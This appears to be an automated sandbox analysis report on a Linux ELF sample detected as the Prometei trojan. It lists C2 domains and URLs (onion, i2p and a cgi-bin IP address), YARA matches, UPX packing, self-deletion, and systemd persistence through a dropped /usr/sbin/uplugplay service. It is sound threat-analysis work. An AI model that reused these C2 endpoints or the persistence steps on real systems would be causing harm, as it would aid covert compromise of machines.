Source: global traffic	DNS traffic detected: DNS query: xinchaocfcfda.com
Source: global traffic	DNS traffic detected: DNS query: xinchaocfcfda.net
Source: global traffic	DNS traffic detected: DNS query: xincfcfda.org

Source: na.elf, uplugplay.12.dr	String found in binary or memory: http://152.36.128
Source: na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
Source: na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
Source: na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: na.elf, uplugplay.12.dr	String found in binary or memory: http://upx.sf.net
Source: na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50542
Source: unknown	Network traffic detected: HTTP traffic on port 57214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50542 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: 5399.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
Source: 5399.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
Source: 5399.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown

Source: LOAD without section mappings

Program segment: 0x400000

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: 5399.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
Source: 5399.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
Source: 5399.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/13@4/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $

Source: /usr/bin/pidof (PID: 5413)	Directory: //.	Jump to behavior
Source: /usr/bin/pidof (PID: 5423)	Directory: //.	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5463)	Directory: <invalid fd (10)>/..	Jump to behavior
Source: /usr/bin/gpg (PID: 5626)	File: /var/lib/fwupd/gnupg/.#lk0x00005570808bbb80.galassia.5626	Jump to behavior
Source: /usr/bin/gpg (PID: 5635)	File: /var/lib/fwupd/gnupg/.#lk0x0000561fb6af5b80.galassia.5635	Jump to behavior
Source: /usr/bin/gpg (PID: 5641)	File: /var/lib/fwupd/gnupg/.#lk0x0000559239bcdb80.galassia.5641	Jump to behavior
Source: /usr/bin/gpg (PID: 5643)	File: /var/lib/fwupd/gnupg/.#lk0x000055965eb8bb80.galassia.5643	Jump to behavior

Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/5383/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/5383/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/5384/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/5384/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/230/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/230/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/110/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/110/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/231/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/231/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/111/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/111/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/232/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/232/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/112/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/112/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/233/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/233/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/113/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/113/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/234/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/234/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/114/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/114/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/235/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/235/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/115/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/115/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/236/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/236/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/116/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/116/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/237/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/237/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/117/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/117/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/238/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/238/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/118/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/118/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/239/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/239/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/119/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/119/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/914/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/914/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/10/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/10/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/917/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/917/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/11/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/11/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/12/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/12/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/13/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/13/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/14/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/14/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/15/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/15/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/16/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/16/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/17/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/17/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/5399/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/5399/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/18/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/18/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/19/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/19/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/240/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/240/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/3095/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/3095/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/120/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/120/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/241/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/241/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/121/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/121/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/242/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/242/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/1/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/1/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/122/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/122/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/243/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/243/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/2/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/2/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/123/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/123/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/244/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/244/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/3/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/3/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/124/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/124/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/245/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/245/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/1588/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/1588/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/125/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/125/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/4/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	File opened: /proc/4/cmdline	Jump to behavior

Source: /tmp/na.elf (PID: 5402)	Shell command executed: sh -c "pgrep na.elf"	Jump to behavior
Source: /tmp/na.elf (PID: 5408)	Shell command executed: sh -c "pgrep uplugplay"	Jump to behavior
Source: /tmp/na.elf (PID: 5412)	Shell command executed: sh -c "pidof uplugplay"	Jump to behavior
Source: /tmp/na.elf (PID: 5416)	Shell command executed: sh -c "pgrep upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 5422)	Shell command executed: sh -c "pidof upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 5430)	Shell command executed: sh -c "systemctl daemon-reload"	Jump to behavior
Source: /tmp/na.elf (PID: 5435)	Shell command executed: sh -c "systemctl enable uplugplay.service"	Jump to behavior
Source: /tmp/na.elf (PID: 5442)	Shell command executed: sh -c "systemctl start uplugplay.service"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5456)	Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5461)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5596)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5606)	Shell command executed: sh -c "dmidecode --type baseboard"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5609)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5620)	Shell command executed: sh -c "uname -a"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5624)	Shell command executed: sh -c "dmidecode --type baseboard"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5632)	Shell command executed: sh -c "dmidecode --type baseboard"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5638)	Shell command executed: sh -c dmidecode	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5646)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5650)	Shell command executed: sh -c "uname -a"	Jump to behavior

Source: /bin/sh (PID: 5403)	Pgrep executable: /usr/bin/pgrep -> pgrep na.elf	Jump to behavior
Source: /bin/sh (PID: 5409)	Pgrep executable: /usr/bin/pgrep -> pgrep uplugplay	Jump to behavior
Source: /bin/sh (PID: 5417)	Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetup	Jump to behavior

Source: /usr/bin/dash (PID: 5665)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.kfY4W8g8cA /tmp/tmp.UsnA55A3DA /tmp/tmp.lNnnmoNhXs			Jump to behavior
Source: /usr/bin/dash (PID: 5674)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.kfY4W8g8cA /tmp/tmp.UsnA55A3DA /tmp/tmp.lNnnmoNhXs			Jump to behavior

Source: /bin/sh (PID: 5431)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/sh (PID: 5436)	Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.service	Jump to behavior
Source: /bin/sh (PID: 5443)	Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.service	Jump to behavior

Source: /usr/sbin/uplugplay (PID: 5457)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5457)	Reads from proc file: /proc/stat	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5457)	Reads from proc file: /proc/meminfo	Jump to behavior

Source: /tmp/na.elf (PID: 5399)

File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)

Jump to behavior

Source: /tmp/na.elf (PID: 5399)

File written: /usr/sbin/uplugplay

Jump to dropped file

Source: submitted sample

Stderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/na.elf (PID: 5399)

File: /usr/sbin/uplugplay

Jump to dropped file

Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)

Source: /bin/sh (PID: 5610)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 5627)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 5633)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 5639)	Dmidecode executable: /usr/sbin/dmidecode dmidecode	Jump to behavior

Sample deletes itself

Source: /tmp/na.elf (PID: 5399)

File: /tmp/na.elf

Jump to behavior

Source: na.elf	Submission file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: na.elf	Submission file: segment LOAD with 7.943 entropy (max. 8.0)
Source: uplugplay.12.dr	Dropped file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: uplugplay.12.dr	Dropped file: segment LOAD with 7.943 entropy (max. 8.0)

Source: /usr/sbin/uplugplay (PID: 5457)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 5403)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5409)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5417)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5457)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5613)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5647)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Source: /tmp/na.elf (PID: 5399)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5444)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5457)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 5621)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 5651)	Queries kernel information via 'uname':	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5463)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5626)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5635)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5641)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5643)	Queries kernel information via 'uname':	Jump to behavior

Language, Device and Operating System Detection

Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)

Source: /bin/sh (PID: 5610)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 5627)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 5633)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 5639)	Dmidecode executable: /usr/sbin/dmidecode dmidecode	Jump to behavior

Source: /bin/sh (PID: 5621)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior
Source: /bin/sh (PID: 5651)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	Boot or Logon Initialization Scripts	1 File and Directory Permissions Modification	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
na.elf	37%	Virustotal		Browse
na.elf	47%	ReversingLabs	Linux.Trojan.Generic
na.elf	100%	Avira	LINUX/GM.Agent.JQ

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/sbin/uplugplay	100%	Avira	LINUX/GM.Agent.JQ
/usr/sbin/uplugplay	47%	ReversingLabs	Linux.Trojan.Generic
/usr/sbin/uplugplay	37%	Virustotal		Browse

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
xinchaocfcfda.net	54.170.242.139	true	false	high
xinchaocfcfda.com	unknown	unknown	false	high
xincfcfda.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://motd.ubuntu.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni	na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://upx.sf.net	na.elf, uplugplay.12.dr	false	high
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi	na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi	na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128.18/cgi-bin/p.cgi	na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://dummy.zero/cgi-bin/prometei.cgi	na.elf, 5399.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128	na.elf, uplugplay.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.170.242.139	xinchaocfcfda.net	United States	16509	AMAZON-02US	false
151.101.2.49	unknown	United States	54113	FASTLYUS	false
152.36.128.18	unknown	United States	81	NCRENUS	true
34.243.160.129	unknown	United States	16509	AMAZON-02US	false
54.247.62.1	unknown	United States	16509	AMAZON-02US	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.170.242.139	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
151.101.2.49	main.exe	Get hash	malicious	Xmrig	Browse	curl.haxx.se/ca/cacert.pem
152.36.128.18	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=62IAJTMW670L811F
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=18&i=OUN25RQLMQZCF139
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=9&i=B8WPYE1VQOU6L061
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=19&i=737105F4680D44P9
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=3&i=2042G33BF5CP87E5
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=39&i=I9B13QK8BGY543GK
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=9&i=IRA5GA09MR523K51
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=21&i=07E0344T5W11DM75
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=8&i=3D1297TGLC2O1QL1
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=7&i=4F6N3TU0SW0RUESR

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xinchaocfcfda.net	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139

ASNs

